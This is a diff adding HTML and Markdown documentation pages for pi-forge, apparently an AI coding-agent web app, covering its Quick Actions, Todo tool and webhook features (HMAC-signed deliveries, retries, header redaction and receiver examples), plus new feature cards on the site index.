+<code>stderr: &quot;spawn …&quot;</code></strong>: the binary isn&#39;t on the agent process&#39;s
+PATH. Pi-forge launches commands with the same PATH as the
+parent process; for chips that need <code>gh</code>, <code>kubectl</code>, etc.,
+ensure they&#39;re installed in the container (the shipped image
+already has <code>git</code>, <code>gh</code>, <code>ripgrep</code>, <code>bash</code>, <code>curl</code>, <code>less</code>,
+<code>procps</code>).</p>
+<p><strong>Chip ran successfully but the output looks cut off.</strong> Stream
+output caps at 1 MB per stream; <code>truncated: true</code> on the result
+means there was more. Re-run in the integrated terminal for the
+full output, or pipe through <code>head</code> / <code>tail</code> in the command
+itself.</p>
+<p><strong>Chip secrets aren&#39;t available.</strong> That&#39;s the scrubbed-env
+behaviour — see <code>TERMINAL_PASSTHROUGH_ENV</code> in
+<a href="./configuration.md#environment-variables"><code>configuration.md</code></a>.
+Add specific var names to the passthrough allowlist.</p>
+<p><strong>Quick Actions tab missing under MINIMAL_UI.</strong> Intentional. The
+chip surface lets the operator embed arbitrary shell commands;
+under MINIMAL_UI the deployment is locked down and end users
+shouldn&#39;t be configuring those. Edit
+<code>${FORGE_DATA_DIR}/quick-actions.json</code> directly and restart.</p>
+<h2>See also</h2>
+<ul>
+<li><a href="./configuration.md"><code>configuration.md</code></a> — <code>FORGE_DATA_DIR</code>
+layout, <code>TERMINAL_PASSTHROUGH_ENV</code> allowlist.</li>
+<li><a href="./processes.md"><code>processes.md</code></a> — the chip-vs-process
+distinction. Chips are one-shot synchronous; the <code>process</code>
+tool is for long-running background processes the agent
+manages.</li>
+</ul>
+
+    </main>
+  </div>
+
+  <button class="sidebar-toggle" id="sidebarToggle" aria-label="Toggle sidebar">&#9776;</button>
+
+  <script>
+    document.getElementById('mobileToggle').addEventListener('click', () => {
+      document.getElementById('navLinks').classList.toggle('open');
+    });
+    document.getElementById('sidebarToggle').addEventListener('click', () => {
+      document.getElementById('docsSidebar').classList.toggle('open');
+    });
+  </script>
+</body>
+</html>

--- a/docs/site/docs/sse-events.html
+++ b/docs/site/docs/sse-events.html
@@ -44,6 +44,12 @@
         <a href="mobile.html">Mobile</a>
         <a href="api.html">API Examples</a>
         <a href="mcp.html">MCP Servers</a>
+        <a href="webhooks.html">Webhooks</a>
+        <a href="orchestration.html">Session Orchestration</a>
+        <a href="processes.html">Background Processes</a>
+        <a href="todo.html">Todo Tool</a>
+        <a href="ask-user-question.html">Ask User Question</a>
+        <a href="quick-actions.html">Quick Actions</a>
         <a href="sse-events.html" class="active">SSE Events</a>
       </div>
       <div class="sidebar-section">

--- a/docs/site/docs/todo.html
+++ b/docs/site/docs/todo.html
@@ -1,0 +1,133 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Todo Tool — pi-forge</title>
+  <meta name="description" content="Browser-native todo tool — session-scoped task list with live UI panel.">
+  <link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'><rect x='1' y='1' width='30' height='30' rx='7' fill='%230d0d10'/><path d='M12 13 H20 M14 13 V21 M18 13 V21' stroke='%23e6e7eb' stroke-width='1.6' stroke-linecap='round' fill='none'/></svg>">
+  <link rel="preconnect" href="https://fonts.googleapis.com">
+  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+  <link rel="stylesheet" href="../style.css">
+</head>
+<body>
+  <header class="site-header">
+    <div class="header-inner">
+      <a href="../index.html" class="logo">
+        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32" fill="none" aria-hidden="true">
+  <rect x="1" y="1" width="30" height="30" rx="7" fill="#0d0d10"/>
+  <path d="M9 11 L6 16 L9 21" stroke="#10b981" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+  <path d="M23 11 L26 16 L23 21" stroke="#10b981" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+  <path d="M12 13 H20 M14 13 V21 M18 13 V21" stroke="#e6e7eb" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+</svg>
+        pi-forge
+      </a>
+      <nav class="nav-links" id="navLinks">
+        <a href="../index.html#features">Features</a>
+        <a href="../index.html#quickstart">Quick Start</a>
+        <a href="architecture.html">Docs</a>
+        <a href="https://github.com/Devin-Marks/pi-forge" class="nav-cta">GitHub</a>
+      </nav>
+      <button class="mobile-toggle" id="mobileToggle" aria-label="Toggle menu">&#9776;</button>
+    </div>
+  </header>
+
+  <div class="docs-layout">
+    <aside class="docs-sidebar" id="docsSidebar">
+      <div class="sidebar-section">
+        <h4>Documentation</h4>
+        <a href="architecture.html">Architecture</a>
+        <a href="configuration.html">Configuration</a>
+        <a href="containers.html">Containers</a>
+        <a href="deployment.html">Deployment</a>
+        <a href="mobile.html">Mobile</a>
+        <a href="api.html">API Examples</a>
+        <a href="mcp.html">MCP Servers</a>
+        <a href="webhooks.html">Webhooks</a>
+        <a href="orchestration.html">Session Orchestration</a>
+        <a href="processes.html">Background Processes</a>
+        <a href="todo.html" class="active">Todo Tool</a>
+        <a href="ask-user-question.html">Ask User Question</a>
+        <a href="quick-actions.html">Quick Actions</a>
+        <a href="sse-events.html">SSE Events</a>
+      </div>
+      <div class="sidebar-section">
+        <h4>Project</h4>
+        <a href="https://github.com/Devin-Marks/pi-forge">GitHub</a>
+        <a href="https://github.com/Devin-Marks/pi-forge/blob/main/CHANGELOG.md">Changelog</a>
+        <a href="https://github.com/Devin-Marks/pi-forge/blob/main/SECURITY.md">Security</a>
+      </div>
+    </aside>
+
+    <main class="docs-main">
+      <h1>Todo Tool</h1>
+      <p class="docs-subtitle">Browser-native todo tool — session-scoped task list with live UI panel.</p>
+<p>pi-forge ships a browser-native implementation of the <code>todo</code> tool: a
+session-scoped task list the agent uses to plan and track multi-step
+work. The agent calls <code>todo</code> with action <code>create / update / list / get / delete / clear</code>; the browser shows a checklist that updates
+live.</p>
+<h2>UI</h2>
+<p>A small <code>ListChecks</code> icon appears in the top-right of the chat input
+<strong>only when the active session has at least one task</strong> (so it&#39;s
+gone the moment the list is cleared). The badge shows
+<code>completed/total</code> so you have at-a-glance progress without clicking.</p>
+<p>Clicking the icon opens a <strong>bottom-strip panel</strong> in the right pane.
+The strip splits whatever right-pane tab is currently visible
+(Files, Search, Changes, Git, or Context) — bottom-third gets
+todos, top-two-thirds stays whatever you were looking at. A
+horizontal divider lets you resize the strip; the height persists in
+localStorage.</p>
+<p>When the right pane is collapsed and you click the icon, the right
+pane auto-opens so the panel has somewhere to land. Closing the
+strip (X in its header, or re-clicking the icon) hides only the
+strip; your right-pane tab is unaffected.</p>
+<h2>Persistence</h2>
+<p>State persists via <strong>branch replay</strong> — exactly the model
+<a href="https://github.com/juicesharp/rpiv-mono/tree/main/packages/rpiv-todo" target="_blank" rel="noopener noreferrer"><code>@juicesharp/rpiv-todo</code></a>
+uses. Every successful <code>todo</code> tool call returns the full state
+(<code>details.tasks</code>, <code>details.nextId</code>) in its result envelope, which
+gets recorded in the session JSONL. On session resume / fork /
+compaction, pi-forge walks the branch and reads the latest todo
+result to rebuild state. There is <strong>no separate todo database</strong> —
+the message history is the source of truth.</p>
+<p>The in-memory cache (<code>packages/server/src/todo/store.ts</code>) is a fast
+path for read-heavy consumers (the UI panel, SSE snapshots);
+cache-miss falls back to branch replay so a server restart can&#39;t
+lie about state.</p>
+<h2>Disabling the tool</h2>
+<p>The tool appears under <strong>Settings → Tools → Built-in tools</strong>.
+Toggle it off there to filter <code>todo</code> out of every new session&#39;s
+tool allowlist. Live sessions keep the tool list they were created
+with.</p>
+<h2>Relationship to <code>@juicesharp/rpiv-todo</code></h2>
+<p>The wire contract — tool name (<code>todo</code>), action enum (<code>create | update | list | get | delete | clear</code>), 4-state machine (<code>pending → in_progress → completed</code> plus <code>deleted</code> as a terminal
+tombstone), <code>blockedBy</code> dependency model with cycle detection, and
+response envelope (<code>{content:[{type:&quot;text&quot;,text}], details:{action, params, tasks, nextId, error?}}</code>) — is <strong>contract-compatible</strong>
+with the upstream Pi extension (MIT). An agent prompt authored
+against the plugin works against this implementation unchanged.</p>
+<p>Implementation is independent. The reducer, validators, envelope
+builder, replay logic, store, and React UI are pi-forge&#39;s own.
+Prompt snippet, tool description, and guidelines are
+<strong>ported verbatim with attribution</strong> in
+<code>packages/server/src/todo/prompt-strings.ts</code> — the plugin author&#39;s
+wording has been tuned against real model behavior (rules like
+&quot;exactly one task in_progress at a time&quot; and &quot;never mark completed
+if tests are failing&quot;), and matching it avoids regressions in
+tool-call quality.</p>
+
+    </main>
+  </div>
+
+  <button class="sidebar-toggle" id="sidebarToggle" aria-label="Toggle sidebar">&#9776;</button>
+
+  <script>
+    document.getElementById('mobileToggle').addEventListener('click', () => {
+      document.getElementById('navLinks').classList.toggle('open');
+    });
+    document.getElementById('sidebarToggle').addEventListener('click', () => {
+      document.getElementById('docsSidebar').classList.toggle('open');
+    });
+  </script>
+</body>
+</html>

--- a/docs/site/docs/webhooks.html
+++ b/docs/site/docs/webhooks.html
@@ -1,0 +1,372 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <title>Webhooks — pi-forge</title>
+  <meta name="description" content="HTTPS POST deliveries on agent and session events. HMAC signing, retry, delivery history.">
+  <link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'><rect x='1' y='1' width='30' height='30' rx='7' fill='%230d0d10'/><path d='M12 13 H20 M14 13 V21 M18 13 V21' stroke='%23e6e7eb' stroke-width='1.6' stroke-linecap='round' fill='none'/></svg>">
+  <link rel="preconnect" href="https://fonts.googleapis.com">
+  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+  <link rel="stylesheet" href="../style.css">
+</head>
+<body>
+  <header class="site-header">
+    <div class="header-inner">
+      <a href="../index.html" class="logo">
+        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32" fill="none" aria-hidden="true">
+  <rect x="1" y="1" width="30" height="30" rx="7" fill="#0d0d10"/>
+  <path d="M9 11 L6 16 L9 21" stroke="#10b981" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+  <path d="M23 11 L26 16 L23 21" stroke="#10b981" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+  <path d="M12 13 H20 M14 13 V21 M18 13 V21" stroke="#e6e7eb" stroke-width="1.6" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
+</svg>
+        pi-forge
+      </a>
+      <nav class="nav-links" id="navLinks">
+        <a href="../index.html#features">Features</a>
+        <a href="../index.html#quickstart">Quick Start</a>
+        <a href="architecture.html">Docs</a>
+        <a href="https://github.com/Devin-Marks/pi-forge" class="nav-cta">GitHub</a>
+      </nav>
+      <button class="mobile-toggle" id="mobileToggle" aria-label="Toggle menu">&#9776;</button>
+    </div>
+  </header>
+
+  <div class="docs-layout">
+    <aside class="docs-sidebar" id="docsSidebar">
+      <div class="sidebar-section">
+        <h4>Documentation</h4>
+        <a href="architecture.html">Architecture</a>
+        <a href="configuration.html">Configuration</a>
+        <a href="containers.html">Containers</a>
+        <a href="deployment.html">Deployment</a>
+        <a href="mobile.html">Mobile</a>
+        <a href="api.html">API Examples</a>
+        <a href="mcp.html">MCP Servers</a>
+        <a href="webhooks.html" class="active">Webhooks</a>
+        <a href="orchestration.html">Session Orchestration</a>
+        <a href="processes.html">Background Processes</a>
+        <a href="todo.html">Todo Tool</a>
+        <a href="ask-user-question.html">Ask User Question</a>
+        <a href="quick-actions.html">Quick Actions</a>
+        <a href="sse-events.html">SSE Events</a>
+      </div>
+      <div class="sidebar-section">
+        <h4>Project</h4>
+        <a href="https://github.com/Devin-Marks/pi-forge">GitHub</a>
+        <a href="https://github.com/Devin-Marks/pi-forge/blob/main/CHANGELOG.md">Changelog</a>
+        <a href="https://github.com/Devin-Marks/pi-forge/blob/main/SECURITY.md">Security</a>
+      </div>
+    </aside>
+
+    <main class="docs-main">
+      <h1>Webhooks</h1>
+      <p class="docs-subtitle">HTTPS POST deliveries on agent and session events. HMAC signing, retry, delivery history.</p>
+<p>HTTPS POST deliveries fired when interesting things happen on a
+session or project. Configure from <strong>Settings → Webhooks</strong>.</p>
+<blockquote>
+<p>A webhook is one direction: pi-forge → your endpoint. If you
+want the opposite (your script reads agent events), use the SSE
+stream documented in <a href="./sse-events.md"><code>sse-events.md</code></a>. The two
+systems are independent — disabling webhooks doesn&#39;t affect SSE.</p>
+</blockquote>
+<h2>Events</h2>
+<p>Seven event types in v1:</p>
+<table>
+<thead>
+<tr>
+<th>Event</th>
+<th>When it fires</th>
+</tr>
+</thead>
+<tbody><tr>
+<td><code>agent_end</code></td>
+<td>An agent turn finished. Payload includes <code>stopReason</code>, <code>errorMessage</code> (if any), the assistant&#39;s text content, usage stats, and the provider/model used.</td>
+</tr>
+<tr>
+<td><code>ask_user_question</code></td>
+<td>The agent put up a multi-choice prompt via the <code>ask_user_question</code> tool and is waiting on a human answer. Payload includes the questions array.</td>
+</tr>
+<tr>
+<td><code>process_alert</code></td>
+<td>A background process the agent spawned via the <code>process</code> tool exited. Same trigger conditions as the in-chat agent alert — success / failure / external kill — see <a href="./processes.md"><code>processes.md</code></a>.</td>
+</tr>
+<tr>
+<td><code>auto_retry_end</code> <em>(failures only)</em></td>
+<td>The SDK&#39;s auto-retry on a provider error exhausted. Useful for paging when an upstream LLM provider goes down.</td>
+</tr>
+<tr>
+<td><code>compaction_end</code> <em>(non-aborted only)</em></td>
+<td>Session context was compacted. Payload includes <code>tokensBefore</code> and the compaction reason.</td>
+</tr>
+<tr>
+<td><code>session_created</code></td>
+<td>A new session was created in a project.</td>
+</tr>
+<tr>
+<td><code>session_deleted</code></td>
+<td>A session was deleted (cold or live). Payload&#39;s <code>wasLive</code> distinguishes &quot;we disposed a running session&quot; from &quot;we removed an on-disk-only JSONL.&quot;</td>
+</tr>
+</tbody></table>
+<h2>Scoping</h2>
+<p>Each webhook is either:</p>
+<ul>
+<li><strong>Global</strong> — fires for every project&#39;s events.</li>
+<li><strong>Per-project</strong> — fires only for events whose <code>projectId</code>
+matches a single configured project.</li>
+</ul>
+<p>Both can coexist. The UI shows global + per-project for the
+currently selected project; switching project re-filters.</p>
+<h2>Delivery, retry, and timeouts</h2>
+<ul>
+<li>POST with <code>Content-Type: application/json</code>, body shape <code>{ event, sessionId?, projectId?, deliveryId, occurredAt, data }</code>.</li>
+<li><strong>2xx</strong> — delivered. Done.</li>
+<li><strong>4xx</strong> — terminal, no retry. The receiver said the payload was
+invalid; retrying with the same body won&#39;t change anything.</li>
+<li><strong>5xx or network error</strong> — retried with exponential backoff:
+<strong>1s, 5s, 30s</strong> (3 attempts total). After the third failure the
+delivery is recorded as <code>failed</code> and the dispatcher moves on.</li>
+<li>Per-attempt timeout is 30 seconds.</li>
+<li>All dispatches are fire-and-forget from the event-bridge
+perspective — the bridge returns as soon as the per-target
+attempt is queued, retries run in the background.</li>
+</ul>
+<h2>Security</h2>
+<h3>HTTPS-only</h3>
+<p>The URL must be <code>https://</code>. The route validates this; <code>http://</code>,
+<code>ssh://</code>, file URLs all 400 with <code>unsupported_protocol</code>.</p>
+<h3>HMAC-SHA256 signatures</h3>
+<p>Configure a <strong>secret</strong> on the webhook to get signed deliveries.
+Every POST then carries:</p>
+<pre><code>X-Pi-Forge-Signature: sha256=&lt;hex digest of the raw JSON body&gt;
+</code></pre>
+<p>Convention matches GitHub&#39;s webhook signing. Verify on the
+receiver side:</p>
+<pre><code class="language-python">import hmac, hashlib
+
+def verify(secret: bytes, body: bytes, header: str) -&gt; bool:
+    expected = &quot;sha256=&quot; + hmac.new(secret, body, hashlib.sha256).hexdigest()
+    return hmac.compare_digest(expected, header)
+</code></pre>
+<p>Secrets are stored in <code>${FORGE_DATA_DIR}/webhooks.json</code> (mode
+<code>0600</code>) and <strong>never returned over the wire</strong> — the API surfaces a
+<code>hasSecret: boolean</code> flag instead of the value. Same posture as
+<code>auth.json</code> provider keys.</p>
+<h3>Self-signed / corporate CA endpoints</h3>
+<p>For internal webhook targets behind a private CA, set the
+per-webhook <strong>&quot;Allow self-signed / invalid TLS certificate&quot;</strong>
+checkbox. Every delivery for that webhook then uses an
+<code>https.Agent({ rejectUnauthorized: false })</code> and writes a
+<code>webhook-insecure-tls</code> line to stderr — so the relaxed posture
+is visible in <code>docker logs</code>.</p>
+<p>The flag <strong>only</strong> relaxes cert validation. The URL must still be
+HTTPS; <code>insecureTls</code> won&#39;t accept <code>http://</code>.</p>
+<h3>Custom headers (Bearer tokens, etc.)</h3>
+<p>Each webhook can carry a set of static request headers — typical
+use is <code>Authorization: Bearer &lt;token&gt;</code> for receivers that need
+their own auth. Headers are stored alongside the rest of the
+config but treated as secret:</p>
+<ul>
+<li><strong>Header values are redacted on the wire.</strong> <code>GET /webhooks</code> and
+<code>GET /webhooks/:id</code> return the header NAMES verbatim but
+replace every VALUE with the <code>***REDACTED***</code> sentinel — the
+same convention <code>config-manager.ts</code> uses for inline <code>apiKey</code> in
+<code>models.json</code>. The wire never carries the real value.</li>
+<li><strong>Editing in the UI preserves stored values.</strong> When the client
+PATCHes back a header value that&#39;s literally the sentinel, the
+server treats it as &quot;keep the existing value.&quot; Typing a new
+value replaces; deleting the field clears the header.</li>
+<li><strong>CREATE rejects the sentinel</strong> as a real value — no prior to
+keep on a fresh create.</li>
+<li><strong>Defense-in-depth at dispatch time</strong>: if the sentinel ever
+ends up in the stored config (hand-edit, future bug), the
+dispatcher skips it at outbound-POST time so the receiver
+never sees <code>Authorization: ***REDACTED***</code>.</li>
+</ul>
+<h3>Reserved headers</h3>
+<p>The following headers are set by pi-forge on every delivery and
+<strong>cannot</strong> be overridden by config:</p>
+<ul>
+<li><code>Content-Type</code> (always <code>application/json</code>)</li>
+<li><code>X-Pi-Forge-Event</code> (event name)</li>
+<li><code>X-Pi-Forge-Delivery</code> (UUID for this attempt)</li>
+<li><code>X-Pi-Forge-Signature</code> (HMAC if a secret is configured)</li>
+<li><code>User-Agent</code> (pi-forge version)</li>
+</ul>
+<p>A configured header with one of these names is silently dropped.</p>
+<h2>Delivery history</h2>
+<p>Every attempt (success or failure) is appended to
+<code>${FORGE_DATA_DIR}/webhook-deliveries.json</code>, capped at <strong>100 per
+webhook</strong> (rolling FIFO). Surfaced in <strong>Settings → Webhooks</strong> under
+the per-webhook drawer, and via <code>GET /webhooks/:id/deliveries</code>.</p>
+<p>Use it to debug a stuck receiver — <code>errorPreview</code> on failed
+attempts shows the first 200 chars of the response body.</p>
+<h2>MINIMAL_UI</h2>
+<p>Webhook configuration is <strong>disabled under <code>MINIMAL_UI=true</code></strong>: the
+Settings tab is hidden, and <code>POST</code> / <code>PATCH</code> / <code>DELETE</code> /
+<code>/test</code> routes return <code>403 minimal_ui_disabled</code>. The <code>GET</code> routes
+stay available so an operator can still audit what&#39;s wired up,
+and event delivery for already-configured webhooks still fires.</p>
+<p>The rationale: webhooks let the server make arbitrary HTTPS calls
+to user-supplied URLs. Under MINIMAL_UI (locked-down deploys),
+only the operator should configure that — via direct file edits
+to <code>${FORGE_DATA_DIR}/webhooks.json</code> or via env-driven config
+management.</p>
+<h2>Storage</h2>
+<table>
+<thead>
+<tr>
+<th>File</th>
+<th>Purpose</th>
+<th>Mode</th>
+</tr>
+</thead>
+<tbody><tr>
+<td><code>webhooks.json</code></td>
+<td>Webhook configs (URLs, events, scope, secrets, headers, TLS flag)</td>
+<td><code>0600</code> — contains HMAC secrets</td>
+</tr>
+<tr>
+<td><code>webhook-deliveries.json</code></td>
+<td>Rolling delivery history (cap 100 / webhook)</td>
+<td><code>0600</code></td>
+</tr>
+</tbody></table>
+<p>Atomic-write + in-process lock pattern (see <code>project-manager.ts</code>
+for the same posture). Single-tenant / single-process assumption
+— cross-process safety would need a real file lock.</p>
+<h2>REST surface</h2>
+<table>
+<thead>
+<tr>
+<th>Method + path</th>
+<th>Purpose</th>
+</tr>
+</thead>
+<tbody><tr>
+<td><code>GET /api/v1/webhooks[?projectId=…]</code></td>
+<td>List webhooks. Optional filter returns global ∪ per-project for one project.</td>
+</tr>
+<tr>
+<td><code>POST /api/v1/webhooks</code></td>
+<td>Create. Validates HTTPS-only URL, non-empty event subscription, known event types.</td>
+</tr>
+<tr>
+<td><code>PATCH /api/v1/webhooks/:id</code></td>
+<td>Partial update. Sentinel-in-header semantics described above.</td>
+</tr>
+<tr>
+<td><code>DELETE /api/v1/webhooks/:id</code></td>
+<td>Delete + prune deliveries.</td>
+</tr>
+<tr>
+<td><code>POST /api/v1/webhooks/:id/test</code></td>
+<td>Fire a synthetic <code>webhook.test</code> event at the target, bypassing the event/scope filter — useful for verifying URL + signature wiring before waiting for a real event.</td>
+</tr>
+<tr>
+<td><code>GET /api/v1/webhooks/:id/deliveries</code></td>
+<td>Recent attempts (newest first), capped at 100 per webhook.</td>
+</tr>
+</tbody></table>
+<p>Mutation routes are gated by MINIMAL_UI; the <code>GET</code> routes are not.</p>
+<p>Full schemas at <code>/api/docs</code>.</p>
+<h2>Receiver examples</h2>
+<h3>Python (FastAPI)</h3>
+<pre><code class="language-python">import hmac, hashlib, os
+from fastapi import FastAPI, Header, HTTPException, Request
+
+app = FastAPI()
+SECRET = os.environ[&quot;WEBHOOK_SECRET&quot;].encode()
+
+@app.post(&quot;/pi-forge&quot;)
+async def receive(
+    request: Request,
+    x_pi_forge_signature: str | None = Header(None),
+    x_pi_forge_event: str | None = Header(None),
+):
+    body = await request.body()
+    if x_pi_forge_signature is None:
+        raise HTTPException(401, &quot;missing signature&quot;)
+    expected = &quot;sha256=&quot; + hmac.new(SECRET, body, hashlib.sha256).hexdigest()
+    if not hmac.compare_digest(expected, x_pi_forge_signature):
+        raise HTTPException(401, &quot;bad signature&quot;)
+    payload = await request.json()
+    # …handle by payload[&quot;event&quot;] ...
+    return {&quot;ok&quot;: True}
+</code></pre>
+<h3>Node (Express)</h3>
+<pre><code class="language-js">import express from &quot;express&quot;;
+import crypto from &quot;node:crypto&quot;;
+
+const app = express();
+const SECRET = process.env.WEBHOOK_SECRET;
+
+app.post(&quot;/pi-forge&quot;, express.raw({ type: &quot;application/json&quot; }), (req, res) =&gt; {
+  const sig = req.get(&quot;X-Pi-Forge-Signature&quot;);
+  const expected = &quot;sha256=&quot; + crypto.createHmac(&quot;sha256&quot;, SECRET)
+    .update(req.body).digest(&quot;hex&quot;);
+  if (!sig || !crypto.timingSafeEqual(Buffer.from(sig), Buffer.from(expected))) {
+    return res.status(401).end(&quot;bad signature&quot;);
+  }
+  const payload = JSON.parse(req.body.toString());
+  // …handle by payload.event ...
+  res.json({ ok: true });
+});
+</code></pre>
+<h2>Troubleshooting</h2>
+<p><strong>Deliveries show <code>failed</code> with no detail.</strong> Check the receiver&#39;s
+TLS chain — pi-forge requires a valid cert by default. If the
+target is internal with a self-signed cert or a private CA, flip
+the per-webhook <strong>Allow self-signed / invalid TLS certificate</strong>
+checkbox.</p>
+<p><strong><code>unsupported_protocol</code> on CREATE.</strong> The URL must be HTTPS.
+Pi-forge intentionally refuses plain HTTP even when <code>insecureTls</code>
+is set — the flag relaxes cert validation, not the scheme.</p>
+<p><strong>The test event arrives but real events don&#39;t.</strong> Check the
+event subscription on the webhook (<code>events</code> array) and the
+scope. A per-project webhook only fires for events whose
+<code>projectId</code> matches.</p>
+<p><strong>Header value lost after editing.</strong> If you PATCHed without
+including the headers field at all, the server leaves stored
+headers alone (the route can&#39;t distinguish &quot;omitted&quot; from
+&quot;cleared&quot; in JSON). If you PATCHed with the field present but a
+value set to the literal <code>***REDACTED***</code> sentinel, that
+specifically means &quot;keep the existing value&quot; — typing a new
+value replaces it.</p>
+<p><strong>MINIMAL_UI disable surprised me.</strong> The Webhooks Settings tab
+hides under MINIMAL_UI and POST/PATCH/DELETE routes 403. Already-
+configured webhooks still fire — disable applies only to config
+changes. To reach the config under MINIMAL_UI, edit
+<code>${FORGE_DATA_DIR}/webhooks.json</code> directly (mode <code>0600</code>) and
+restart.</p>
+<h2>See also</h2>
+<ul>
+<li><a href="./orchestration.md"><code>orchestration.md</code></a> — the in-app equivalent
+of webhook fan-out. Orchestration routes worker events back to
+a supervisor session&#39;s inbox; webhooks route them out over
+HTTPS. Same underlying event bridge feeds both.</li>
+<li><a href="./sse-events.md"><code>sse-events.md</code></a> — the streaming-pull
+alternative for real-time consumers.</li>
+<li><a href="./processes.md"><code>processes.md</code></a> — what triggers <code>process_alert</code>.</li>
+<li><a href="./ask-user-question.md"><code>ask-user-question.md</code></a> — what triggers
+<code>ask_user_question</code>.</li>
+<li><a href="../CLAUDE.md"><code>CLAUDE.md</code></a> — file-by-file map of the
+<code>packages/server/src/webhooks/</code> module.</li>
+</ul>
+
+    </main>
+  </div>
+
+  <button class="sidebar-toggle" id="sidebarToggle" aria-label="Toggle sidebar">&#9776;</button>
+
+  <script>
+    document.getElementById('mobileToggle').addEventListener('click', () => {
+      document.getElementById('navLinks').classList.toggle('open');
+    });
+    document.getElementById('sidebarToggle').addEventListener('click', () => {
+      document.getElementById('docsSidebar').classList.toggle('open');
+    });
+  </script>
+</body>
+</html>

--- a/docs/site/index.html
+++ b/docs/site/index.html
@@ -96,12 +96,32 @@
       <div class="feature-card">
         <div class="feature-icon">&#128279;</div>
         <h3>MCP server integration</h3>
-        <p>Connect remote Model Context Protocol servers over StreamableHTTP or SSE. Per-project <code>.mcp.json</code> overrides, header status badge, and a master kill-switch for restricted environments.</p>
+        <p>Connect remote Model Context Protocol servers (StreamableHTTP / SSE) AND local stdio servers. Per-project <code>.mcp.json</code> with a per-project trust gate on stdio, header status badge, and a master kill-switch for restricted environments.</p>
       </div>
       <div class="feature-card">
         <div class="feature-icon">&#128736;</div>
         <h3>Per-tool enable / disable</h3>
         <p>Every tool the agent could call — pi's seven built-ins plus each MCP server's tools — toggleable individually with per-project overrides. Allow-by-default; changes apply on the next session.</p>
+      </div>
+      <div class="feature-card">
+        <div class="feature-icon">&#128104;&#8205;&#128104;&#8205;&#128103;</div>
+        <h3>Session orchestration</h3>
+        <p>Opt-in supervisor mode for a session: spawn worker sessions, watch their inboxes, course-correct mid-execution, hand off context. Hub-and-spoke topology, same-project, depth=1; off unless <code>ORCHESTRATION_ENABLED=true</code>.</p>
+      </div>
+      <div class="feature-card">
+        <div class="feature-icon">&#128268;</div>
+        <h3>Webhooks</h3>
+        <p>HTTPS POST deliveries on agent and session events — turn-end, ask-user-question, process alerts, retry failures, compaction, lifecycle. Global or per-project scope, HMAC-SHA256 signing, retry with exponential backoff, delivery history.</p>
+      </div>
+      <div class="feature-card">
+        <div class="feature-icon">&#9881;&#65039;</div>
+        <h3>Background-process tool</h3>
+        <p>The <code>process</code> tool lets the agent spawn long-running processes — dev servers, watchers, builds — that outlive a single turn. Per-session manager, log capture, regex watches, alerts on exit.</p>
+      </div>
+      <div class="feature-card">
+        <div class="feature-icon">&#9889;</div>
+        <h3>Quick actions</h3>
+        <p>Operator-defined chips in the chat toolbar that either run a shell command in the active project or insert/send a templated prompt. Your personal toolbox for the things you run twenty times a day.</p>
       </div>
       <div class="feature-card">
         <div class="feature-icon">&#128172;</div>

--- a/docs/webhooks.md
+++ b/docs/webhooks.md
@@ -1,0 +1,275 @@
+# Webhooks
+
+HTTPS POST deliveries fired when interesting things happen on a
+session or project. Configure from **Settings → Webhooks**.
+
+> A webhook is one direction: pi-forge → your endpoint. If you
+> want the opposite (your script reads agent events), use the SSE
+> stream documented in [`sse-events.md`](./sse-events.md). The two
+> systems are independent — disabling webhooks doesn't affect SSE.
+
+## Events
+
+Seven event types in v1:
+
+| Event | When it fires |
+|---|---|
+| `agent_end` | An agent turn finished. Payload includes `stopReason`, `errorMessage` (if any), the assistant's text content, usage stats, and the provider/model used. |
+| `ask_user_question` | The agent put up a multi-choice prompt via the `ask_user_question` tool and is waiting on a human answer. Payload includes the questions array. |
+| `process_alert` | A background process the agent spawned via the `process` tool exited. Same trigger conditions as the in-chat agent alert — success / failure / external kill — see [`processes.md`](./processes.md). |
+| `auto_retry_end` *(failures only)* | The SDK's auto-retry on a provider error exhausted. Useful for paging when an upstream LLM provider goes down. |
+| `compaction_end` *(non-aborted only)* | Session context was compacted. Payload includes `tokensBefore` and the compaction reason. |
+| `session_created` | A new session was created in a project. |
+| `session_deleted` | A session was deleted (cold or live). Payload's `wasLive` distinguishes "we disposed a running session" from "we removed an on-disk-only JSONL." |
+
+## Scoping
+
+Each webhook is either:
+
+- **Global** — fires for every project's events.
+- **Per-project** — fires only for events whose `projectId`
+  matches a single configured project.
+
+Both can coexist. The UI shows global + per-project for the
+currently selected project; switching project re-filters.
+
+## Delivery, retry, and timeouts
+
+- POST with `Content-Type: application/json`, body shape `{ event,
+  sessionId?, projectId?, deliveryId, occurredAt, data }`.
+- **2xx** — delivered. Done.
+- **4xx** — terminal, no retry. The receiver said the payload was
+  invalid; retrying with the same body won't change anything.
+- **5xx or network error** — retried with exponential backoff:
+  **1s, 5s, 30s** (3 attempts total). After the third failure the
+  delivery is recorded as `failed` and the dispatcher moves on.
+- Per-attempt timeout is 30 seconds.
+- All dispatches are fire-and-forget from the event-bridge
+  perspective — the bridge returns as soon as the per-target
+  attempt is queued, retries run in the background.
+
+## Security
+
+### HTTPS-only
+
